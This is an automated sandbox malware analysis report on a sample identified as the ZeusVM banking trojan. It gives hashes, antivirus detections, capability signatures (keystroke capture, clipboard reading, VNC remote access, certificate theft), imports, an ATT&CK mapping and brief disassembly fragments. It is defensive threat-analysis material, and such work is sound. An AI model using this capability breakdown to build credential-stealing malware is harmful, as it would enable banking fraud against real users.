
Analysis Report eUTopTYPuc

Overview

General Information

Sample Name: eUTopTYPuc (renamed file extension from none to exe)
Analysis ID: 349662
MD5: 09580ec10df3398ce68c176121fbba66
SHA1: d86cc8b0439b75ffecf6df985161c81f028a6fe2
SHA256: 06a0b2c3fc763506f6340dc4f582f7980378f7ededfb807541afeeca0499d8cd
Tags: uncategorized

Detection

ZeusVM
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected ZeusVM e-Banking Trojan
Multi AV Scanner detection for submitted file
Contains VNC / remote desktop functionality (version string found)
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
May initialize a security null descriptor
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • eUTopTYPuc.exe (PID: 632 cmdline: 'C:\Users\user\Desktop\eUTopTYPuc.exe' MD5: 09580EC10DF3398CE68C176121FBBA66)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: eUTopTYPuc.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: eUTopTYPuc.exe | Virustotal: Detection: 91%
Source: eUTopTYPuc.exe | Metadefender: Detection: 78%
Source: eUTopTYPuc.exe | ReversingLabs: Detection: 96%
Machine Learning detection for sample
Source: eUTopTYPuc.exe | Joe Sandbox ML: detected
Source: 0.0.eUTopTYPuc.exe.400000.0.unpack | Avira: Label: TR/Spy.Zbot.aoqb.5
Source: 0.2.eUTopTYPuc.exe.400000.0.unpack | Avira: Label: TR/Spy.Zbot.aoqb.5
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00417429 CryptUnprotectData, LocalFree
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040812A CryptAcquireContextW, CryptCreateHash, CryptHashData, CryptGetHashParam, CryptDestroyHash, CryptReleaseContext

Compliance:

Uses 32bit PE files
Source: eUTopTYPuc.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0041628F GetFileAttributesExW, ReadProcessMemory, LoadLibraryW, GetProcAddress, SHGetFolderPathW, StrCmpNIW, FreeLibrary, NetUserEnum, NetUserGetInfo, NetApiBufferFree, NetApiBufferFree, SHGetFolderPathW
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040C4F3 FindFirstFileW, FindNextFileW, FindClose, SetFileAttributesW, RemoveDirectoryW
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040C5AE FindFirstFileW, Sleep, WaitForSingleObject, PathMatchSpecW, Sleep, Sleep, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00408C27 WaitForSingleObject, InternetReadFile
Source: eUTopTYPuc.exe | String found in binary or memory: http://www.google.com/webhp
Source: eUTopTYPuc.exe | String found in binary or memory: http://www.google.com/webhpbcSeShutdownPrivilegeRFB
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00404D18 GetFileAttributesExW, HttpSendRequestW, HttpSendRequestA, HttpSendRequestExW, HttpSendRequestExA, InternetCloseHandle, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpQueryInfoA, closesocket, send, WSASend, OpenInputDesktop, SwitchDesktop, DefWindowProcW, DefWindowProcA, DefDlgProcW, DefDlgProcA, DefFrameProcW, DefFrameProcA, DefMDIChildProcW, DefMDIChildProcA, CallWindowProcW, CallWindowProcA, RegisterClassW, RegisterClassA, RegisterClassExW, RegisterClassExA, BeginPaint, EndPaint, GetDCEx, GetDC, GetWindowDC, ReleaseDC, GetUpdateRect, GetUpdateRgn, GetMessagePos, GetCursorPos, SetCursorPos, SetCapture, ReleaseCapture, GetCapture, GetMessageW, GetMessageA, PeekMessageW, PeekMessageA, TranslateMessage, GetClipboardData, PFXImportCertStore
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00405CE7 EnterCriticalSection, GetTickCount, LeaveCriticalSection, GetKeyboardState, ToUnicode, TranslateMessage

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0041D132 lstrcmpiA, lstrcmpiA, lstrcmpiA, CloseHandle
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040EF1F OpenWindowStationW, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CreateDesktopW, GetCurrentThreadId, GetThreadDesktop, SetThreadDesktop, CloseDesktop, CloseWindowStation
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_004087A7 LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, CreateProcessAsUserW, CloseHandle, CloseHandle, CloseHandle, FreeLibrary
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040F429 InitiateSystemShutdownExW, ExitWindowsEx
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_004136AC CreateMutexW, GetLastError, CloseHandle, CloseHandle, ExitWindowsEx, OpenEventW, SetEvent, CloseHandle, CloseHandle, GetFileAttributesExW, ReadProcessMemory, GetFileAttributesExW, ReadProcessMemory, Sleep, IsWellKnownSid, GetFileAttributesExW, ReadProcessMemory, GetFileAttributesExW, VirtualFree, CreateEventW, WaitForSingleObject, WaitForMultipleObjects, CloseHandle, CloseHandle, CloseHandle, CloseHandle
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00402823
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00408036
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_004117CB
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00409BD8
Source: eUTopTYPuc.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: classification engine | Classification label: mal72.bank.troj.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0041A581 CertOpenSystemStoreW, CertEnumCertificatesInStore, CertEnumCertificatesInStore, CertEnumCertificatesInStore, PFXExportCertStoreEx, PFXExportCertStoreEx, PFXExportCertStoreEx, CharLowerW, GetSystemTime, CertCloseStore
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0041A6F6 CertOpenSystemStoreW, CertEnumCertificatesInStore, CertDuplicateCertificateContext, CertDeleteCertificateFromStore, CertEnumCertificatesInStore, CertCloseStore
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00408551 GetCurrentThread, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, CloseHandle
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_004084FA CreateToolhelp32Snapshot, Thread32First, Thread32Next, CloseHandle
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00417185 CoCreateInstance
Source: eUTopTYPuc.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: eUTopTYPuc.exe | Virustotal: Detection: 91%
Source: eUTopTYPuc.exe | Metadefender: Detection: 78%
Source: eUTopTYPuc.exe | ReversingLabs: Detection: 96%
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_004178F9 LoadLibraryW, GetProcAddress, FreeLibrary
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00403143 push cs; ret 0_2_00403158
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00403179 push cs; iretd 0_2_00403188
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00402AAD push es; iretd 0_2_00402ABC
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00411FB9 LoadLibraryA, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, LoadImageW, GetIconInfo, GetCursorPos, DrawIcon, lstrcmpiW, FreeLibrary, FreeLibrary, FreeLibrary, FreeLibrary
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040C4F3 FindFirstFileW, FindNextFileW, FindClose, SetFileAttributesW, RemoveDirectoryW
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040C5AE FindFirstFileW, Sleep, WaitForSingleObject, PathMatchSpecW, Sleep, Sleep, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_004178F9 LoadLibraryW, GetProcAddress, FreeLibrary
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00412738 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00412A7D GetModuleHandleW, GetModuleHandleW, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, HeapCreate, GetProcessHeap, InitializeCriticalSection, WSAStartup, CreateEventW, GetLengthSid, GetCurrentProcessId
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040A474 InitializeSecurityDescriptor, SetSecurityDescriptorDacl, ConvertStringSecurityDescriptorToSecurityDescriptorW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, LocalFree
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0041AC79 RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetLocalTime
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0041A525 GetUserNameExW
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00406FAF GetTimeZoneInformation
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00413002 GetComputerNameW, GetVersionExW, RegOpenKeyExW
Source: eUTopTYPuc.exe | Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: eUTopTYPuc.exe | String found in binary or memory: RFB 003.003
Source: eUTopTYPuc.exe | String found in binary or memory: RFB 003.003
Source: eUTopTYPuc.exe, 00000000.00000000.203019463.0000000000401000.00000020.00020000.sdmp | String found in binary or memory: scriptnbsp;Basic tmp%s%08x.%s%s%08x*SysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXME.tmphttp://www.google.com/webhpbcSeShutdownPrivilegeRFB 003.003
Source: eUTopTYPuc.exe | String found in binary or memory: RFB 003.003
Source: eUTopTYPuc.exe | String found in binary or memory: scriptnbsp;Basic tmp%s%08x.%s%s%08x*SysListView32MDIClientCiceroUIWndFrameConsoleWindowClass#32768SysShadowFIXME.tmphttp://www.google.com/webhpbcSeShutdownPrivilegeRFB 003.003
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_0040A2A5 socket, bind, closesocket
Source: C:\Users\user\Desktop\eUTopTYPuc.exe | Code function: 0_2_00409FC7 socket, bind, listen, closesocket

Mitre Att&ck Matrix

The matrix is listed below by tactic (one line per column). Numbers in parentheses are the counts the matrix attached to matched techniques.

Initial Access: Valid Accounts (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Native API (1), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence: Create Account (1), Valid Accounts (1), Application Shimming (1), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (11), Application Shimming (1), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion: Valid Accounts (1), Access Token Manipulation (11), Obfuscated Files or Information (1), Install Root Certificate (1), Software Packing (1), Steganography, Compile After Delivery, Indicator Removal from Tools
Credential Access: Input Capture (11), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Network Share Discovery (1), System Time Discovery (2), Security Software Discovery (1), Process Discovery (1), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (3)
Lateral Movement: Remote Desktop Protocol (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection: Input Capture (11), Archive Collected Data (1), Clipboard Data (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (2), Remote Access Software (1), Ingress Tool Transfer (1), Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1), Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue

Behavior Graph


Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
eUTopTYPuc.exe | 92% | Virustotal |
eUTopTYPuc.exe | 83% | Metadefender |
eUTopTYPuc.exe | 96% | ReversingLabs | Win32.Trojan.Zeus
eUTopTYPuc.exe | 100% | Avira | TR/Spy.Zbot.aoqb.5
eUTopTYPuc.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
0.0.eUTopTYPuc.exe.400000.0.unpack | 100% | Avira | TR/Spy.Zbot.aoqb.5
0.2.eUTopTYPuc.exe.400000.0.unpack | 100% | Avira | TR/Spy.Zbot.aoqb.5

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 349662
Start date: 07.02.2021
Start time: 15:10:11
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 11s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: eUTopTYPuc (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.bank.troj.winEXE@1/0@0/0
EGA Information: Failed
HDC Information:
  • Successful, ratio: 99.9% (good quality ratio 91%)
  • Quality average: 80%
  • Quality standard deviation: 31.7%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: MS-DOS executable
Entropy (8bit): 6.695252019797953
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • DOS Executable Borland Pascal 7.0x (2037/25) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • VXD Driver (31/22) 0.00%
File name: eUTopTYPuc.exe
File size: 141824
MD5: 09580ec10df3398ce68c176121fbba66
SHA1: d86cc8b0439b75ffecf6df985161c81f028a6fe2
SHA256: 06a0b2c3fc763506f6340dc4f582f7980378f7ededfb807541afeeca0499d8cd
SHA512: f5c48d2393ed7663016c09dc0f4549cddc1f9fe9f243db74e89de7f14f745ab836657e2f224ac4d70c0c23587a736c508a43c16f4cb4a394d6722844bf047330
SSDEEP: 3072:/SV0AxFxYlFZR3v4iNGMHRHaFtC7qQZkGUGTVpAXhS5qsFwDFox63KruM:/Y0AKlFZR3v4icKHaFGxUsAXhSYsupUb
File Content Preview: MZ......................................................................................................................................................................................................................PE..L...V..N.....................:.....

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x4139f2
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp: 0x4EAF1E56 [Mon Oct 31 22:16:54 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 0b998d2a10b9f3bb78c6703e634f1aff

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push 00000000h
xor bl, bl
call 00007FB00CDDF4A0h
test al, al
je 00007FB00CDE04FAh
push 00008007h
mov byte ptr [ebp-10h], bl
mov byte ptr [ebp-0Ch], 00000001h
mov byte ptr [ebp-01h], bl
call dword ptr [00401178h]
lea eax, dword ptr [ebp-08h]
push eax
call dword ptr [00401174h]
push eax
call dword ptr [004012CCh]
test eax, eax
je 00007FB00CDE04A7h
xor edx, edx
cmp dword ptr [ebp-08h], edx
jle 00007FB00CDE0461h
mov ecx, dword ptr [eax+edx*4]
test ecx, ecx
je 00007FB00CDE0454h
cmp word ptr [ecx], 002Dh
jne 00007FB00CDE044Eh
movzx ecx, word ptr [ecx+02h]
cmp ecx, 66h
je 00007FB00CDE0441h
cmp ecx, 69h
je 00007FB00CDE0438h
cmp ecx, 6Eh
je 00007FB00CDE042Dh
cmp ecx, 76h
jne 00007FB00CDE0436h
mov byte ptr [ebp-01h], 00000001h
jmp 00007FB00CDE0430h
mov byte ptr [ebp-0Ch], 00000000h
jmp 00007FB00CDE042Ah
mov bl, 01h
jmp 00007FB00CDE0426h
mov byte ptr [ebp-10h], 00000001h
inc edx
cmp edx, dword ptr [ebp-08h]
jl 00007FB00CDE03E3h
push eax
call dword ptr [00401130h]
test bl, bl
je 00007FB00CDE0429h
call 00007FB00CDDFE55h
jmp 00007FB00CDE0456h
cmp byte ptr [ebp-01h], 00000000h
je 00007FB00CDE0445h
call 00007FB00CDDA34Bh
call 00007FB00CDD2176h
test byte ptr [00423968h], 00000004h
mov bl, al
je 00007FB00CDE043Dh
push 00000000h
mov eax, 004231B8h
call 00007FB00CDDA1A8h
jmp 00007FB00CDE042Fh

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1f754 | 0x118 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25000 | 0x11a4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x5a0 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x20634 | 0x20800 | False | 0.640144230769 | data | 6.71836960756 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x22000 | 0x204c | 0x400 | False | 0.2099609375 | data | 1.62977361771 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x25000 | 0x1664 | 0x1800 | False | 0.626302083333 | data | 5.62270089865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL: Imports
KERNEL32.dll: FlushFileBuffers, GetTempPathW, GetFileSizeEx, OpenMutexW, GetLastError, SetLastError, VirtualAlloc, VirtualProtectEx, VirtualAllocEx, FindClose, LoadLibraryA, RemoveDirectoryW, WaitForMultipleObjects, FindNextFileW, VirtualProtect, GetFileTime, ReleaseMutex, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, LocalFree, GetSystemTime, WriteProcessMemory, SetFileAttributesW, CreateThread, ExpandEnvironmentStringsW, SystemTimeToFileTime, UnmapViewOfFile, MultiByteToWideChar, CreateEventW, GetCurrentThreadId, TlsAlloc, TlsFree, MoveFileExW, GetModuleFileNameW, GetUserDefaultUILanguage, ExitProcess, GetCommandLineW, SetErrorMode, GetComputerNameW, GetVersionExW, OpenEventW, DuplicateHandle, GetCurrentProcessId, GetNativeSystemInfo, GetThreadContext, SetThreadContext, GetProcessId, GetPrivateProfileStringW, GetPrivateProfileIntW, lstrcmpiA, WTSGetActiveConsoleSessionId, GetLocalTime, HeapAlloc, CreateProcessW, CreateFileW, GetTimeZoneInformation, ReadFile, Thread32Next, GetFileAttributesW, HeapCreate, HeapDestroy, FreeLibrary, SetEndOfFile, ReadProcessMemory, Sleep, LoadLibraryW, WideCharToMultiByte, Thread32First, WriteFile, VirtualQueryEx, SetFileTime, IsBadReadPtr, GetProcessHeap, VirtualFree, CreateDirectoryW, HeapFree, CreateFileMappingW, SetFilePointerEx, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, CloseHandle, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualFreeEx, OpenProcess, CreateRemoteThread, EnterCriticalSection, GlobalUnlock, LeaveCriticalSection, InitializeCriticalSection, GetTickCount, GlobalLock, ResetEvent, SetThreadPriority, TerminateProcess, TlsSetValue, GetCurrentThread, SetEvent, WaitForSingleObject, TlsGetValue, GetFileAttributesExW, lstrcmpiW, GetProcAddress, MapViewOfFile, GetModuleHandleW
USER32.dll: LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, CharToOemW, GetWindowLongW, CharLowerA, CharUpperW, SetWindowLongW, SendMessageTimeoutW, GetWindow, DispatchMessageW, GetKeyboardState, ToUnicode, FillRect, PostMessageW, GetWindowInfo, GetTopWindow, IntersectRect, PostThreadMessageW, EqualRect, PrintWindow, SendMessageW, IsRectEmpty, EndPaint, GetMenuItemID, GetUpdateRgn, GetMessageW, RegisterClassExA, GetWindowDC, SetCapture, CharLowerBuffA, CharLowerW, GetThreadDesktop, MapVirtualKeyW, DrawIcon, GetIconInfo, GetSystemMetrics, GetWindowRect, GetParent, GetClassLongW, GetAncestor, SetWindowPos, IsWindow, MapWindowPoints, ExitWindowsEx, CreateDesktopW, SetProcessWindowStation, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, CloseDesktop, SetThreadDesktop, OpenWindowStationW, SetKeyboardState, GetSubMenu, GetShellWindow, OpenDesktopW, RegisterWindowMessageW, DrawEdge, MenuItemFromPoint, GetMenuItemRect, TrackPopupMenuEx, RegisterClassA, DefFrameProcW, SystemParametersInfoW, GetClassNameW, GetMenuState, GetMenuItemCount, DefDlgProcW, DefFrameProcA, OpenInputDesktop, BeginPaint, GetUpdateRect, GetDC, GetCapture, TranslateMessage, RegisterClassExW, SetCursorPos, GetClipboardData, PeekMessageW, GetDCEx, PeekMessageA, ReleaseDC, DefWindowProcA, GetCursorPos, DefMDIChildProcW, HiliteMenuItem, GetUserObjectInformationW, EndMenu, GetWindowThreadProcessId, GetMessageA, GetMessagePos, DefWindowProcW, CallWindowProcW, CallWindowProcA, RegisterClassW, ReleaseCapture, DefMDIChildProcA, DefDlgProcA, SwitchDesktop, GetMenu
ADVAPI32.dll: GetLengthSid, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenKeyExW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegCloseKey, RegSetValueExW, CryptHashData, InitiateSystemShutdownExW, IsWellKnownSid, ConvertSidToStringSidW, EqualSid, RegEnumKeyExW
SHLWAPI.dll: wvnsprintfW, StrStrIW, StrStrIA, StrCmpNIW, PathQuoteSpacesW, PathIsURLW, PathRenameExtensionW, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathRemoveBackslashW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathRemoveFileSpecW, PathFindFileNameW, PathIsDirectoryW, UrlUnescapeA
SHELL32.dll: ShellExecuteW, SHGetFolderPathW, CommandLineToArgvW
Secur32.dll: GetUserNameExW
ole32.dll: StringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dll: CreateCompatibleBitmap, GetDIBits, CreateDIBSection, SetViewportOrgEx, DeleteDC, GdiFlush, DeleteObject, SelectObject, SetRectRgn, CreateCompatibleDC, GetDeviceCaps, RestoreDC, SaveDC
WS2_32.dll: sendto, getsockname, select, getaddrinfo, recvfrom, getpeername, accept, listen, WSAEventSelect, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, WSAGetLastError, shutdown, setsockopt, bind, socket, recv, freeaddrinfo, WSASend, closesocket, send, WSASetLastError
CRYPT32.dll: CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData, PFXImportCertStore, PFXExportCertStoreEx
WININET.dll: HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpAddRequestHeadersA, InternetQueryOptionA, InternetOpenA, HttpOpenRequestA, InternetSetOptionA, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, InternetCloseHandle, HttpSendRequestA, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpQueryInfoA, HttpSendRequestExA
OLEAUT32.dll: VariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dll: NetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

Code Manipulations

Statistics

System Behavior

General

Start time: 15:10:58
Start date: 07/02/2021
Path: C:\Users\user\Desktop\eUTopTYPuc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\eUTopTYPuc.exe'
Imagebase: 0x400000
File size: 141824 bytes
MD5 hash: 09580EC10DF3398CE68C176121FBBA66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 87%
    			E00412A7D(signed int** __ecx, void* __edx, signed char _a4) {
    				char _v293;
    				char _v780;
    				char _v788;
    				char _v800;
    				intOrPtr _v808;
